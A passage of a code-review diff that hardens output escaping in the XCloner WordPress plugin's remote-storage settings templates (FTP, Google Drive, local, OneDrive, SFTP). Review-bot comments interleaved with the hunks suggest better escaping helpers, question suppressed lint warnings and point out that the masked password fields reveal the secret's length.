-                onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/ftp.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/ftp.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("FTP Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("FTP Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -26,17 +26,17 @@
 <div class="collapsible-body">
     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_host"><?php echo __("Ftp Hostname", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_host"><?php echo esc_html__("Ftp Hostname", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class="col s12 m6">
             <input
                     id="ftp_host"
-                    placeholder="<?php echo __("Ftp Hostname", 'xcloner-backup-and-restore') ?>"
+                    placeholder="<?php echo esc_html__("Ftp Hostname", 'xcloner-backup-and-restore') ?>"
                     type="text" name="xcloner_ftp_hostname" class="validate"
                     value="<?php echo esc_attr(get_option("xcloner_ftp_hostname")) ?>">
         </div>
         <div class=" col s12 m2">
-            <input placeholder="<?php echo __("Ftp Port", 'xcloner-backup-and-restore') ?>" id="ftp_port" type="text"
+            <input placeholder="<?php echo esc_html__("Ftp Port", 'xcloner-backup-and-restore') ?>" id="ftp_port" type="text"
                    name="xcloner_ftp_port" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_ftp_port", 21)) ?>">
         </div>
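Review bot: the two `placeholder="..."` values in this hunk (`ftp_host` and `ftp_port`) are attribute context, so `esc_attr__()` is the matching helper rather than `esc_html__()`. Both encode quotes, so the output is safe as written, but the two helpers run through different filters and the attribute variant states the intent. The same applies to every other placeholder in this patch; `esc_html__()` is right for the `<label>` text.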
@@ -44,10 +44,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_username"><?php echo __("Ftp Username", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_username"><?php echo esc_html__("Ftp Username", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Ftp Username", 'xcloner-backup-and-restore') ?>" id="ftp_username"
+            <input placeholder="<?php echo esc_html__("Ftp Username", 'xcloner-backup-and-restore') ?>" id="ftp_username"
                    type="text" name="xcloner_ftp_username" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_ftp_username")) ?>" autocomplete="off">
         </div>
@@ -56,10 +56,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_password"><?php echo __("Ftp Password", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_password"><?php echo esc_html__("Ftp Password", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Ftp Password", 'xcloner-backup-and-restore') ?>" id="ftp_password"
+            <input placeholder="<?php echo esc_html__("Ftp Password", 'xcloner-backup-and-restore') ?>" id="ftp_password"
                    type="text" name="xcloner_ftp_password" class="validate"
                    value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_ftp_password")))) ?>"
                    autocomplete="off">
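Review bot: the unchanged `value` line for `ftp_password` still prints one `*` per character of the stored password, via `str_repeat('*', strlen(get_option("xcloner_ftp_password")))`, into a `type="text"` input, so the page discloses the secret's length to whoever can render it. This hunk only changes the label and placeholder. For an information-exposure fix, consider a fixed-length mask or an empty value with a "leave blank to keep the current password" convention, and switch the input to `type="password"`.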
@@ -68,10 +68,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_root"><?php echo __("Ftp Storage Folder", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_root"><?php echo esc_html__("Ftp Storage Folder", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Ftp Storage Folder", 'xcloner-backup-and-restore') ?>" id="ftp_root"
+            <input placeholder="<?php echo esc_html__("Ftp Storage Folder", 'xcloner-backup-and-restore') ?>" id="ftp_root"
                    type="text" name="xcloner_ftp_path" class="validate"
                    value="<?php echo esc_attr(urldecode(get_option("xcloner_ftp_path") ?: '')) ?>">
         </div>
@@ -79,7 +79,7 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_root"><?php echo __("Ftp Transfer Mode", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_root"><?php echo esc_html__("Ftp Transfer Mode", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6 input-field inline">
             <p>
@@ -88,7 +88,7 @@
                            value="1" <?php if (get_option("xcloner_ftp_transfer_mode", 1)) {
                         echo "checked";
                     } ?> />
-                    <span><?php echo __("Passive", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Passive", 'xcloner-backup-and-restore') ?></span>
                 </label>
             </p>
             <p>
@@ -97,7 +97,7 @@
                            value="0" <?php if (!get_option("xcloner_ftp_transfer_mode", 1)) {
                         echo "checked";
                     } ?> />
-                    <span><?php echo __("Active", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Active", 'xcloner-backup-and-restore') ?></span>
                 </label>
             </p>
         </div>
@@ -105,7 +105,7 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_ssl_mode"><?php echo __("Ftp Secure Connection", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_ssl_mode"><?php echo esc_html__("Ftp Secure Connection", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6 input-field inline">
             <p>
@@ -114,7 +114,7 @@
                            value="0" <?php if (!get_option("xcloner_ftp_ssl_mode")) {
                         echo "checked";
                     } ?> />
-                    <span><?php echo __("Disable", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Disable", 'xcloner-backup-and-restore') ?></span>
                 </label></p>
             <p>
                 <label for="ftp_ssl_mode_active">
@@ -122,34 +122,34 @@
                            value="1" <?php if (get_option("xcloner_ftp_ssl_mode")) {
                         echo "checked";
                     } ?> />
-                    <span><?php echo __("Enable", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Enable", 'xcloner-backup-and-restore') ?></span>
                 </label></p>
         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="ftp_timeout"><?php echo __("Ftp Timeout", 'xcloner-backup-and-restore') ?></label>
+            <label for="ftp_timeout"><?php echo esc_html__("Ftp Timeout", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m2">
-            <input placeholder="<?php echo __("Ftp Timeout", 'xcloner-backup-and-restore') ?>" id="ftp_timeout"
+            <input placeholder="<?php echo esc_html__("Ftp Timeout", 'xcloner-backup-and-restore') ?>" id="ftp_timeout"
                    type="text" name="xcloner_ftp_timeout" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_ftp_timeout", 30)) ?>">
         </div>
     </div>

-    <?php echo common_cleanup_html('ftp') ?>
+    <?php echo common_cleanup_html('ftp') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                    value="ftp"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                    value="ftp"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="ftp"
-                    onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                    onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
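Review bot: `common_cleanup_html('ftp')` is silenced with `phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped` instead of being escaped, and nothing in the hunk says why its return value is safe to print. Either pass the result through `wp_kses()` with the tags the helper is expected to emit, or escape inside the helper and state that in the ignore comment. Separately, both buttons at the end of the hunk carry `id="action"`, which duplicates an id within the same markup.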
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/gdrive.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/gdrive.php
@@ -15,7 +15,7 @@
 $gdrive_construct = $remote_storage->gdrive_construct();
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("Google Drive Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("Google Drive Storage", 'xcloner-backup-and-restore') ?>
     <?php if ($gdrive_construct): ?>
     <div class="switch right">
         <label>
@@ -39,7 +39,7 @@
         </div>
         <div class=" col s12 m9">
             <p>
-                <?php echo sprintf(__('Click the Google Sign-in button below to complete the 1-time integration.'));  ?>
+                <?php echo sprintf(__('Click the Google Sign-in button below to complete the 1-time integration.', 'xcloner-backup-and-restore')); // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
             </p>
         </div>
     </div>
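Review bot: on the changed line `sprintf()` is called with a single argument, so it does nothing, and the `phpcs:ignore` is only needed because the string is still fetched with `__()`. `echo esc_html__('Click the Google Sign-in button below to complete the 1-time integration.', 'xcloner-backup-and-restore');` gives escaped output and lets the suppression go. Adding the missing text domain is a good catch.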
@@ -52,37 +52,37 @@
             <a class="" target="_blank" id="gdrive_authorization_click"
                 onclick="jQuery('#authentification_code').show()"
                 href="<?php echo esc_url($gdrive_auth_url) ?>">
-                <img src="<?php echo plugin_dir_url(__DIR__)?>/../../assets/btn_google_signin_dark_pressed_web.png"
-                alt="<?php echo sprintf(__('Authorize Google Drive', 'xcloner-backup-and-restore')) ?>"/>
+                <img src="<?php echo esc_url(plugin_dir_url(__DIR__))?>/../../assets/btn_google_signin_dark_pressed_web.png"
+                alt="<?php echo sprintf(__('Authorize Google Drive', 'xcloner-backup-and-restore')) // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>"/>
                 </a>
             <input type="text" name="authentification_code" id="authentification_code"
-                placeholder="<?php echo __("Paste Authorization Code Here", "xcloner-backup-and-restore") ?>">
+                placeholder="<?php echo esc_html__("Paste Authorization Code Here", "xcloner-backup-and-restore") ?>">
         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="gdrive_target_folder"><?php echo __("Folder ID or Root Path", 'xcloner-backup-and-restore') ?>
+            <label for="gdrive_target_folder"><?php echo esc_html__("Folder ID or Root Path", 'xcloner-backup-and-restore') ?>
                 <a class="btn-floating tooltipped btn-small" data-position="right" data-delay="50" data-html="true" 
-                    data-tooltip="<?php echo __('Folder ID can be found by right clicking on the folder name and selecting 'Get shareable link' menu, format https://drive.google.com/open?id={FOLDER_ID}<br />
+                    data-tooltip="<?php echo esc_html__('Folder ID can be found by right clicking on the folder name and selecting 'Get shareable link' menu, format https://drive.google.com/open?id={FOLDER_ID}<br />
 									If you supply a folder name, it has to exists in the drive root and start with / , example /backups.xcloner.com/', 'xcloner-backup-and-restore') ?>"
                     data-tooltip-id="92c95730-94e9-7b59-bd52-14adc30d5e3e"><i
                         class="material-icons">help_outline</i></a>
             </label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Target Folder ID or Root Path", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("Target Folder ID or Root Path", 'xcloner-backup-and-restore') ?>"
                 id="gdrive_target_folder" type="text" name="xcloner_gdrive_target_folder" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_gdrive_target_folder")) ?>" autocomplete="off">
         </div>
     </div>

-    <?php echo common_cleanup_html('gdrive')?>
+    <?php echo common_cleanup_html('gdrive') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="gdrive_empty_trash"><?php echo __("Automatically Empty Trash?", 'xcloner-backup-and-restore') ?></label>
+                for="gdrive_empty_trash"><?php echo esc_html__("Automatically Empty Trash?", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6 input-field inline">
             <p>
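Review bot: the `data-tooltip` attribute sits on an element marked `data-html="true"` and its string contains `<br />`, so `esc_html__()` here only protects the attribute boundary. The browser decodes the entities when it parses the attribute, and a tooltip script that honors `data-html` will then insert the decoded markup. If the intent is to stop markup coming from a translation, filter the string with `wp_kses()` allowing only `br` before `esc_attr()`. In the same hunk the `alt` text keeps `sprintf(__())` behind a `phpcs:ignore`; `esc_attr__()` would remove the need for it.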
@@ -90,7 +90,7 @@
                     <input name="xcloner_gdrive_empty_trash" type="radio" value="0" id="gdrive_empty_trash_off" <?php if (!get_option("xcloner_gdrive_empty_trash", 0)) {
                                         echo "checked";
                                     } ?> />
-                    <span><?php echo __("Disabled", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Disabled", 'xcloner-backup-and-restore') ?></span>
                 </label>
             </p>
             <p>
@@ -98,7 +98,7 @@
                     <input name="xcloner_gdrive_empty_trash" type="radio" value="1" id="gdrive_empty_trash_on" <?php if (get_option("xcloner_gdrive_empty_trash", 0)) {
                                         echo "checked";
                                     } ?> />
-                    <span><?php echo __("Enabled", 'xcloner-backup-and-restore') ?></span>
+                    <span><?php echo esc_html__("Enabled", 'xcloner-backup-and-restore') ?></span>
                 </label>
             </p>
         </div>
@@ -107,13 +107,13 @@
     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                value="gdrive"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="gdrive"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="gdrive"
-                onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
@@ -126,22 +126,22 @@
                 <?php
                                         $url = wp_nonce_url(self_admin_url('update.php?action=install-plugin&plugin=xcloner-google-drive'), 'install-plugin_xcloner-google-drive');
                                         ?>
-                <h6><?php echo __("This storage option requires the XCloner-Google-Drive Wordpress Plugin to be installed and activated.") ?>
+                <h6><?php echo esc_html__("This storage option requires the XCloner-Google-Drive Wordpress Plugin to be installed and activated.", 'xcloner-backup-and-restore') ?>
                 </h6>
-                <h6><?php echo __("PHP 5.5 minimum version is required.") ?></h6>
+                <h6><?php echo esc_html__("PHP 5.5 minimum version is required.", 'xcloner-backup-and-restore') ?></h6>
                 <br />
                 <a class="install-now btn" data-slug="xcloner-google-drive" href="<?php echo esc_url($url); ?>"
                     aria-label="Install XCloner Google Drive 1.0.0 now" data-name="XCloner Google Drive 1.0.0">
-                    <?php echo sprintf(__('Install Now', 'xcloner-backup-and-restore')) ?>
+                    <?php echo sprintf(__('Install Now', 'xcloner-backup-and-restore')) // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
                 </a>

-                <a href="<?php echo admin_url("plugin-install.php") ?>?tab=plugin-information&plugin=xcloner-google-drive&TB_iframe=true&width=772&height=499"
+                <a href="<?php echo esc_url(admin_url("plugin-install.php")) ?>?tab=plugin-information&plugin=xcloner-google-drive&TB_iframe=true&width=772&height=499"
                     class="btn thickbox open-plugin-details-modal"
                     aria-label="More information about Theme Check 20160523.1" data-title="Theme Check 20160523.1">
                     <!--
 											<a class="btn" href="https://github.com/ovidiul/XCloner-Google-Drive/archive/master.zip">
 											-->
-                    <?php echo sprintf(__('More Details', 'xcloner-backup-and-restore')) ?>
+                    <?php echo sprintf(__('More Details', 'xcloner-backup-and-restore')) // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>
                 </a>
             </div>
         </div>
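Review bot: on the "More Details" link only the `admin_url("plugin-install.php")` part goes through `esc_url()`; the query string `?tab=plugin-information&plugin=xcloner-google-drive&TB_iframe=true&width=772&height=499` is appended afterwards as literal template text with bare `&`. Build the whole URL with `add_query_arg()` and escape it once with `esc_url()`. The 'Install Now' and 'More Details' strings also keep the no-op `sprintf(__())` plus `phpcs:ignore` where `esc_html__()` would do.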
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/local.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/local.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("Local Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("Local Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -19,10 +19,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_key"><?php echo __("Backup Start Location", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_key"><?php echo esc_html__("Backup Start Location", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backup Start Location", 'xcloner-backup-and-restore') ?>" id="aws_key"
+            <input placeholder="<?php echo esc_html__("Backup Start Location", 'xcloner-backup-and-restore') ?>" id="aws_key"
                 type="text" name="xcloner_start_path" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_start_path")) ?>" autocomplete="off">
         </div>
@@ -30,27 +30,27 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="aws_key"><?php echo __("Backup Storage Location", 'xcloner-backup-and-restore') ?></label>
+            <label for="aws_key"><?php echo esc_html__("Backup Storage Location", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("Backup Storage Location", 'xcloner-backup-and-restore') ?>" id="aws_key"
+            <input placeholder="<?php echo esc_html__("Backup Storage Location", 'xcloner-backup-and-restore') ?>" id="aws_key"
                 type="text" name="xcloner_store_path" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_store_path")) ?>" autocomplete="off">
         </div>
     </div>

-    <?php echo common_cleanup_html('local')?>
+    <?php echo common_cleanup_html('local') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light" type="submit" name="action" id="action"
-                value="local"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="local"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="local"
-                onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/onedrive.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/onedrive.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("OneDrive Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("OneDrive Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -25,18 +25,20 @@
         </div>
         <div class=" col s12 m6">
             <p>
-                <?php echo sprintf(__('Visit <a href="%s" target="_blank">Microsoft Azure App Registrations</a> and get your Client ID and Client Secret. More details on setting up the code flow authentication can be found <a href="%s">here</a>.
-                                    Make sure to also add the %s to the Authentication->Redirect URIs area', 'xcloner-backup-and-restore'), 'https://portal.azure.com/#blade/Microsoft_AAD_RegisteredApps/ApplicationsListBlade', 'https://docs.microsoft.com/en-us/onedrive/developer/rest-api/getting-started/graph-oauth?view=odsp-graph-online#code-flow', get_admin_url()) ?>
+                <?php // phpcs:disable WordPress.Security.EscapeOutput.OutputNotEscaped, WordPress.WP.I18n.MissingTranslatorsComment, WordPress.WP.I18n.UnorderedPlaceholdersText
+                echo sprintf(__('Visit <a href="%s" target="_blank">Microsoft Azure App Registrations</a> and get your Client ID and Client Secret. More details on setting up the code flow authentication can be found <a href="%s">here</a>.
+                                    Make sure to also add the %s to the Authentication->Redirect URIs area', 'xcloner-backup-and-restore'), 'https://portal.azure.com/#blade/Microsoft_AAD_RegisteredApps/ApplicationsListBlade', 'https://docs.microsoft.com/en-us/onedrive/developer/rest-api/getting-started/graph-oauth?view=odsp-graph-online#code-flow', get_admin_url());
+                // phpcs:enable WordPress.Security.EscapeOutput.OutputNotEscaped, WordPress.WP.I18n.MissingTranslatorsComment, WordPress.WP.I18n.UnorderedPlaceholdersText ?>
             </p>
         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="onedrive_client_id"><?php echo __("OneDrive Client ID", 'xcloner-backup-and-restore') ?></label>
+            <label for="onedrive_client_id"><?php echo esc_html__("OneDrive Client ID", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("OneDrive Client ID", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("OneDrive Client ID", 'xcloner-backup-and-restore') ?>"
                 id="onedrive_client_id" type="text" name="xcloner_onedrive_client_id" class="validate"
                 value="<?php echo esc_attr(get_option("xcloner_onedrive_client_id")) ?>" autocomplete="off">
         </div>
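Review bot: the OneDrive help paragraph now disables three sniffs (`OutputNotEscaped`, `MissingTranslatorsComment`, `UnorderedPlaceholdersText`) around a `sprintf()` whose third `%s` is `get_admin_url()` printed without escaping. The string needs its `<a>` tags, so `esc_html__()` is not an option, but the disable/enable pair can be avoided: run the result through `wp_kses()` with an allow-list for `a` (`href`, `target`), apply `esc_url()` to each URL argument, use numbered placeholders (`%1$s`, `%2$s`, `%3$s`) and add a `translators:` comment.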
@@ -45,10 +47,10 @@
     <div class="row">
         <div class="col s12 m3 label">
             <label
-                for="onedrive_client_secret"><?php echo __("OneDrive Client Secret", 'xcloner-backup-and-restore') ?></label>
+                for="onedrive_client_secret"><?php echo esc_html__("OneDrive Client Secret", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("OneDrive Client Secret", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("OneDrive Client Secret", 'xcloner-backup-and-restore') ?>"
                 id="onedrive_client_secret" type="text" name="xcloner_onedrive_client_secret" class="validate"
                 value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_onedrive_client_secret")))) ?>"
                 autocomplete="off">
@@ -62,34 +64,34 @@
         <div class=" col s12 m6">
             <a class="btn" target="_blank" id="onedrive_authorization_click" onclick="jQuery(this).attr('href', jQuery(this).attr('target_href') + '&client_id=' + jQuery('#onedrive_client_id').val());
                                        jQuery('.onedrive-action').click()" href="#"
-                target_href="https://login.microsoftonline.com/common/oauth2/v2.0/authorize?scope=offline_access files.readwrite.all  files.read files.read.all files.readwrite&response_type=code&redirect_uri=<?php echo get_admin_url('')?>"><?php echo sprintf(__('Authorize OneDrive', 'xcloner-backup-and-restore')) ?></a>
+                target_href="https://login.microsoftonline.com/common/oauth2/v2.0/authorize?scope=offline_access files.readwrite.all  files.read files.read.all files.readwrite&response_type=code&redirect_uri=<?php echo esc_url(get_admin_url(''))?>"><?php echo sprintf(__('Authorize OneDrive', 'xcloner-backup-and-restore')) // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?></a>

         </div>
     </div>

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="onedrive_path"><?php echo __("OneDrive Storage Folder", 'xcloner-backup-and-restore') ?></label>
+            <label for="onedrive_path"><?php echo esc_html__("OneDrive Storage Folder", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("OneDrive Storage Folder Path", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("OneDrive Storage Folder Path", 'xcloner-backup-and-restore') ?>"
                 id="onedrive_path" type="text" name="xcloner_onedrive_path" class="validate"
                 value="<?php echo esc_attr(urldecode(get_option("xcloner_onedrive_path") ?: '')) ?>">
         </div>
     </div>

-    <?php echo common_cleanup_html('onedrive')?>
+    <?php echo common_cleanup_html('onedrive') // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>

     <div class="row">
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light onedrive-action" type="submit" name="action" id="action"
-                value="onedrive"><?php echo __("Save Settings", 'xcloner-backup-and-restore') ?>
+                value="onedrive"><?php echo esc_html__("Save Settings", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">save</i>
             </button>
         </div>
         <div class="col s6 m4">
             <button class="btn waves-effect waves-light orange" type="submit" name="action" id="action" value="onedrive"
-                onclick="jQuery('#connection_check').val('1')"><?php echo __("Verify", 'xcloner-backup-and-restore') ?>
+                onclick="jQuery('#connection_check').val('1')"><?php echo esc_html__("Verify", 'xcloner-backup-and-restore') ?>
                 <i class="material-icons right">import_export</i>
             </button>
         </div>
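Review bot: in `target_href`, `esc_url(get_admin_url(''))` fills the `redirect_uri` query parameter of the Microsoft authorize URL. `esc_url()` cleans a URL for output but does not percent-encode it as a parameter value, so the `:`, `/` and any `?` or `&` of the admin URL land in the outer query string as they are; `rawurlencode()` followed by `esc_attr()` is the fitting pair here. The `scope` value on the same line also contains literal spaces.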
--- a/xcloner-backup-and-restore/admin/partials/remote_storage/sftp.php
+++ b/xcloner-backup-and-restore/admin/partials/remote_storage/sftp.php
@@ -5,7 +5,7 @@
 }
 ?>
 <div class="collapsible-header">
-    <i class="material-icons">computer</i><?php echo __("SFTP Storage", 'xcloner-backup-and-restore') ?>
+    <i class="material-icons">computer</i><?php echo esc_html__("SFTP Storage", 'xcloner-backup-and-restore') ?>
     <div class="switch right">
         <label>
             Off
@@ -23,15 +23,15 @@
 <div class="collapsible-body">
     <div class="row">
         <div class="col s12 m3 label">
-            <label for="sftp_host"><?php echo __("SFTP Hostname", 'xcloner-backup-and-restore') ?></label>
+            <label for="sftp_host"><?php echo esc_html__("SFTP Hostname", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class="col s12 m6">
-            <input placeholder="<?php echo __("SFTP Hostname", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("SFTP Hostname", 'xcloner-backup-and-restore') ?>"
                    id="sftp_host" type="text" name="xcloner_sftp_hostname" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_sftp_hostname")) ?>">
         </div>
         <div class=" col s12 m2">
-            <input placeholder="<?php echo __("SFTP Port", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("SFTP Port", 'xcloner-backup-and-restore') ?>"
                    id="sftp_port" type="text" name="xcloner_sftp_port" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_sftp_port", 22)) ?>">
         </div>
@@ -39,10 +39,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="sftp_username"><?php echo __("SFTP Username", 'xcloner-backup-and-restore') ?></label>
+            <label for="sftp_username"><?php echo esc_html__("SFTP Username", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("SFTP Username", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("SFTP Username", 'xcloner-backup-and-restore') ?>"
                    id="sftp_username" type="text" name="xcloner_sftp_username" class="validate"
                    value="<?php echo esc_attr(get_option("xcloner_sftp_username")) ?>" autocomplete="off">
         </div>
@@ -51,10 +51,10 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="sftp_password"><?php echo __("SFTP or Private Key Password", 'xcloner-backup-and-restore') ?></label>
+            <label for="sftp_password"><?php echo esc_html__("SFTP or Private Key Password", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
-            <input placeholder="<?php echo __("SFTP or Private Key Password", 'xcloner-backup-and-restore') ?>"
+            <input placeholder="<?php echo esc_html__("SFTP or Private Key Password", 'xcloner-backup-and-restore') ?>"
                    id="ftp_spassword" type="text" name="xcloner_sftp_password" class="validate"
                    value="<?php echo esc_attr(str_repeat('*', strlen(get_option("xcloner_sftp_password")))) ?>"
                    autocomplete="off">
@@ -63,11 +63,11 @@

     <div class="row">
         <div class="col s12 m3 label">
-            <label for="sftp_private_key"><?php echo __("SFTP Private Key(RSA)", 'xcloner-backup-and-restore') ?></label>
+            <label for="sftp_private_key"><?php echo esc_html__("SFTP Private Key(RSA)", 'xcloner-backup-and-restore') ?></label>
         </div>
         <div class=" col s12 m6">
                                 <textarea rows="5"
-                                          placeholder="<?php echo __("Local Server Path or Contents of the SFTP Private Key RSA File", 'xcloner-backup-and-restore') ?>"
+                                          placeholder="<?php echo esc_html__("Local Server Path or Contents of the SFTP Private Key RSA File", 'xcloner-backup-and-restore') ?>"
                                           id="sftp_private_key" type="text" name="xcloner_sftp_private_key"
                                           class="validate"
                                           value=""><?php echo esc_attr(get_option("xcloner_sftp_private_key")) ?></textarea>
